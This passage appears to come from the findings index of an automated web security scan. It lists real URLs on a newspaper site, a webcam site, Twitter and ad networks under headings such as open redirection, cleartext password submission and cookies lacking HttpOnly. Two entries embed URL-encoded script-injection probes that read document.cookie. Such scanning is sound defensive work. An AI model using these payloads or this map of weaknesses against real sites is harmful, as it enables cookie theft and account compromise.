4.1030. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

4.1031. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.1032. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

4.1033. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

4.1034. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

4.1035. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

4.1036. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [FFpb cookie]

4.1037. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.1038. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.1039. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [FFpb cookie]

4.1040. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

4.1041. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]

4.1042. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]

4.1043. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

4.1044. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

4.1045. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]

4.1046. http://xads.zedo.com/ads2/c [a parameter]

4.1047. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://ad.afy11.net/crossdomain.xml

5.2. https://tt3.zedo.com/crossdomain.xml

6. Cleartext submission of password

6.1. http://ar.imlive.com/

6.2. http://bostonherald.com/track/inside_track/view.bg

6.3. http://bostonherald.com/track/star_tracks/view.bg

6.4. http://bostonherald.com/users/login

6.5. http://bostonherald.com/users/register/

6.6. http://br.imlive.com/

6.7. http://cafr.imlive.com/

6.8. http://de.imlive.com/

6.9. http://digg.com/submit

6.10. http://dk.imlive.com/

6.11. http://es.imlive.com/

6.12. http://fr.imlive.com/

6.13. http://gr.imlive.com/

6.14. http://imlive.com/

6.15. http://imlive.com/homepagems3.asp

6.16. http://imlive.com/webcam-login/

6.17. http://in.imlive.com/

6.18. http://it.imlive.com/

6.19. http://jp.imlive.com/

6.20. http://mx.imlive.com/

6.21. http://nl.imlive.com/

6.22. http://no.imlive.com/

6.23. http://pu.imlive.com/

6.24. http://ru.imlive.com/

6.25. http://se.imlive.com/

6.26. http://support.moxiesoft.com/

6.27. http://tr.imlive.com/

6.28. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

6.29. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

6.30. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

6.31. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

6.32. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

6.33. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

6.34. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

6.35. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

6.36. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

6.37. http://www.bostonherald.com/news/regional/view.bg

6.38. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

6.39. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

6.40. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

6.41. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

6.42. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

6.43. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

6.44. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

6.45. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

6.46. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

6.47. http://www.bostonherald.com/users/register

6.48. http://www.bostonherald.com/users/register/

6.49. http://www.paperg.com/

6.50. http://www.parker-software.com/forum/

6.51. http://www.parkersoft.co.uk/client.aspx

6.52. http://www.screenthumbs.com/

6.53. http://www.screenthumbs.com/about

6.54. http://www.screenthumbs.com/contact

6.55. http://www.screenthumbs.com/forgot

6.56. http://www.screenthumbs.com/linkthumbs

6.57. http://www.screenthumbs.com/plugins

6.58. http://www.screenthumbs.com/service

6.59. http://www.screenthumbs.com/signup

6.60. http://www.screenthumbs.com/signup.php

6.61. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

7. Session token in URL

7.1. http://base.liveperson.net/hc/5296924/

7.2. https://base.liveperson.net/hc/5296924/

7.3. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202419556/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

7.4. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1258292573/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

7.5. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1443540246/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/7263485738303033424c73414270536c

7.6. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1663408298/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

7.7. http://raw.oggifinogi.com/Track.aspx

7.8. http://www.bostonherald.com/entertainment/movies/

7.9. http://www.quantcast.com/p-352ZWwG8I7OVQ

8. Password field submitted using GET method

9. Open redirection

9.1. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk [REST URL parameter 3]

9.2. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

9.3. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

10. Cookie scoped to parent domain

10.1. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

10.2. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

10.3. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

10.4. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

10.5. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/

10.6. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r

10.7. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

10.8. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/

10.9. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

10.10. http://a.tribalfusion.com/h.click/aSmNQC4dnZdQGvZc4AvFoHXrUWjbYF761UQe1TAsPbQAUFr0VdJ5mbftPU7m1TFq3aZbi4TnRmEbCXFYgTdFUnAfDms7rmHnL3qZbh5t6m3mBGmUjZd0GnPXsF21GbOnab43UY5VrJEVmU4REj0PsQnSHfM0WJpT6bItejgZb2/http:/t.mookie1.com/t/v1/clk

10.11. http://a.tribalfusion.com/h.click/aUmNQC5EY73tyM4A7JnUbZbYGvUXc3XXGnwmaZbU5U3QVUFHWP72PT33QcYpSdUM0dBsVmrp2cYVYrYATPys4AZbgQPMF4WUn0dBKpdZay3PvY4Vb7VcQdVsMeSPYyUWY3Ur7S3UaoVEYpTTBaPE3JQcjKQUIoPH7WnHRP4p/

10.12. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

10.13. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/

10.14. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r

10.15. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/

10.16. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r

10.17. http://a.tribalfusion.com/i.cid

10.18. http://a.tribalfusion.com/j.ad

10.19. http://ad.afy11.net/ad

10.20. http://ad.doubleclick.net/click

10.21. http://ad.doubleclick.net/jump/N339.8427.TRIBALFUSIONADNETWORK2/B5094459.6

10.22. http://ad.doubleclick.net/jump/N6103.135388.BIZO/B5185769.6

10.23. http://ad.turn.com/server/ads.js

10.24. http://ad.turn.com/server/pixel.htm

10.25. http://amch.questionmarket.com/adsc/d791689/21/39823749/decide.php

10.26. http://ar.voicefive.com/b/wc_beacon.pli

10.27. http://ar.voicefive.com/bmx3/broker.pli

10.28. http://ar.voicefive.com/bmx3/broker.pli

10.29. http://ar.voicefive.com/bmx3/broker.pli

10.30. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c

10.31. http://b.scorecardresearch.com/b

10.32. http://b.scorecardresearch.com/r

10.33. http://base.liveperson.net/hc/5296924/

10.34. https://base.liveperson.net/hc/5296924/

10.35. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

10.36. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp

10.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.38. http://c.chango.com/collector/tag.js

10.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

10.40. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js

10.41. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

10.42. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js

10.43. http://cbs6albany.oodle.com/

10.44. http://cbs6albany.oodle.com/pro/fb-follow/

10.45. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/1302/egc.js

10.46. http://d7.zedo.com/OzoDB/cutils/R52_9/jsc/951/egc.js

10.47. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

10.48. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js

10.49. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js

10.50. http://d7.zedo.com/bar/v16-401/d3/jsc/gl.js

10.51. http://d7.zedo.com/img/bh.gif

10.52. http://d7.zedo.com/utils/ecSet.js

10.53. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

10.54. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/vj

10.55. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

10.56. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj

10.57. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

10.58. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj

10.59. http://ib.adnxs.com/ab

10.60. http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html

10.61. http://ib.adnxs.com/getuid

10.62. http://ib.adnxs.com/getuidnb

10.63. http://ib.adnxs.com/getuidu

10.64. http://ib.adnxs.com/mapuid

10.65. http://ib.adnxs.com/ptj

10.66. http://ib.adnxs.com/ptj

10.67. http://ib.adnxs.com/ptj

10.68. http://ib.adnxs.com/ptj

10.69. http://ib.adnxs.com/ptj

10.70. http://ib.adnxs.com/ptj

10.71. http://ib.adnxs.com/ptj

10.72. http://ib.adnxs.com/ptj

10.73. http://ib.adnxs.com/ptj

10.74. http://ib.adnxs.com/ptj

10.75. http://ib.adnxs.com/ptj

10.76. http://ib.adnxs.com/ptj

10.77. http://ib.adnxs.com/ptj

10.78. http://ib.adnxs.com/ptj

10.79. http://ib.adnxs.com/ptj

10.80. http://ib.adnxs.com/ptj

10.81. http://ib.adnxs.com/ptj

10.82. http://ib.adnxs.com/ptj

10.83. http://ib.adnxs.com/ptj

10.84. http://ib.adnxs.com/ptj

10.85. http://ib.adnxs.com/ptj

10.86. http://ib.adnxs.com/ptj

10.87. http://ib.adnxs.com/ptj

10.88. http://ib.adnxs.com/ptj

10.89. http://ib.adnxs.com/ptj

10.90. http://ib.adnxs.com/ptj

10.91. http://ib.adnxs.com/ptj

10.92. http://ib.adnxs.com/ptj

10.93. http://ib.adnxs.com/ptj

10.94. http://ib.adnxs.com/ptj

10.95. http://ib.adnxs.com/ttj

10.96. http://media.fastclick.net/w/click.here

10.97. http://media.fastclick.net/w/get.media

10.98. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it

10.99. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1/

10.100. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1065387053@Top1

10.101. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

10.102. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

10.103. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

10.104. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

10.105. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

10.106. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1486965027@Top1

10.107. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1498309992@Top1

10.108. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1718093063@Top1

10.109. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1728982362@Top1

10.110. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1847523344@Top1

10.111. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1932249236@Top1

10.112. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1964557901@Top1

10.113. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1969188118@Top1

10.114. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

10.115. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

10.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

10.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

10.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/536763197@Bottom3

10.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/567583486@Bottom3

10.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/569818986@Bottom3

10.121. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/598415254@Bottom3

10.122. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/709688261@Bottom3

10.123. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/781946036@Bottom3

10.124. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/816963349@Bottom3

10.125. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle

10.126. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top

10.127. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@x01!x01

10.128. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

10.129. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

10.130. http://syndication.mmismm.com/mmtnt.php

10.131. http://tag.contextweb.com/TAGPUBLISH/getad.aspx

10.132. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

10.133. http://tap.rubiconproject.com/oz/sensor

10.134. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

10.135. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/click.txt

10.136. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdeWwI0QV6uhKZSsWwFXkKSQ==/view.pxl

10.137. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt

10.138. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/view.pxl

10.139. http://voken.eyereturn.com/

10.140. http://voken.eyereturn.com/

10.141. http://voken.eyereturn.com/pb/get

10.142. http://voken.eyereturn.com/pix

10.143. http://xads.zedo.com/ads2/c

11. Cookie without HttpOnly flag set

11.1. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

11.2. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7

11.3. http://ads.adxpose.com/ads/ads.js

11.4. http://ads.adxpose.com/ads/tag.js

11.5. http://ads2.adbrite.com/favicon.ico

11.6. http://base.liveperson.net/visitor/addons/deploy.asp

11.7. http://base.liveperson.net/visitor/addons/deploy.asp

11.8. http://boston30.autochooser.com/results.asp

11.9. http://event.adxpose.com/event.flow

11.10. http://imlive.com/homepagems3.asp

11.11. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

11.12. http://local.nissanusa.com/zip.aspx

11.13. http://support.moxiesoft.com/

11.14. http://twitter.com/

11.15. http://twitter.com/247realmedia

11.16. http://twitter.com/AddThis

11.17. http://twitter.com/Applebees

11.18. http://twitter.com/AshieApple

11.19. http://twitter.com/Beckett_News

11.20. http://twitter.com/BosHerald_Edge/

11.21. http://twitter.com/ChrisLambton13

11.22. http://twitter.com/ConanOBrien

11.23. http://twitter.com/DustinPedroia15

11.24. http://twitter.com/ExpertDan

11.25. http://twitter.com/GQMagazine

11.26. http://twitter.com/Gr8BosFoodBank

11.27. http://twitter.com/Harvard

11.28. http://twitter.com/Jarvis_Green

11.29. http://twitter.com/JennyMcCarthy

11.30. http://twitter.com/John_W_Henry

11.31. http://twitter.com/KaseyRKahl

11.32. http://twitter.com/KhloeKardashian

11.33. http://twitter.com/KimKardashian

11.34. http://twitter.com/Late_Show

11.35. http://twitter.com/LibertyHotel

11.36. http://twitter.com/Michael_Joseph

11.37. http://twitter.com/Michael_Joseph/status/30390775099424770

11.38. http://twitter.com/Michael_Joseph/status/30750905452204032

11.39. http://twitter.com/Michael_Joseph/status/30790097846673409

11.40. http://twitter.com/MittRomney

11.41. http://twitter.com/NewYorkPost

11.42. http://twitter.com/Nicole_114

11.43. http://twitter.com/Oprah

11.44. http://twitter.com/PageLines

11.45. http://twitter.com/PageLines/status/27898822361354240

11.46. http://twitter.com/PhantomGourmet

11.47. http://twitter.com/Prucenter

11.48. http://twitter.com/PureADK

11.49. http://twitter.com/ROBERTPLANT

11.50. http://twitter.com/RealLamarOdom

11.51. http://twitter.com/RobertDuffy

11.52. http://twitter.com/ScampoLiberty

11.53. http://twitter.com/Script_Junkie

11.54. http://twitter.com/Sean_P_Doyle

11.55. http://twitter.com/Servigistics

11.56. http://twitter.com/ShaunieONeal

11.57. http://twitter.com/Simply_b06

11.58. http://twitter.com/Simply_b06/status/29173383425949696

11.59. http://twitter.com/Siobhan_Magnus

11.60. http://twitter.com/SlexAxton

11.61. http://twitter.com/StarWrit

11.62. http://twitter.com/Support

11.63. http://twitter.com/Svantasukhai

11.64. http://twitter.com/THE_REAL_SHAQ

11.65. http://twitter.com/TV38Boston

11.66. http://twitter.com/TechCrunch

11.67. http://twitter.com/TheKateBosworth

11.68. http://twitter.com/Trackgals

11.69. http://twitter.com/Trackgals/

11.70. http://twitter.com/_juliannemoore

11.71. http://twitter.com/about

11.72. http://twitter.com/about/contact

11.73. http://twitter.com/about/resources

11.74. http://twitter.com/account/complete

11.75. http://twitter.com/account/profile_image/malsup

11.76. http://twitter.com/account/resend_password

11.77. http://twitter.com/ajpiano

11.78. http://twitter.com/androidnewsblog

11.79. http://twitter.com/backstreetboys

11.80. http://twitter.com/benmezrich

11.81. http://twitter.com/bennadel

11.82. http://twitter.com/bostonherald

11.83. http://twitter.com/business

11.84. http://twitter.com/cjronson

11.85. http://twitter.com/cowboy

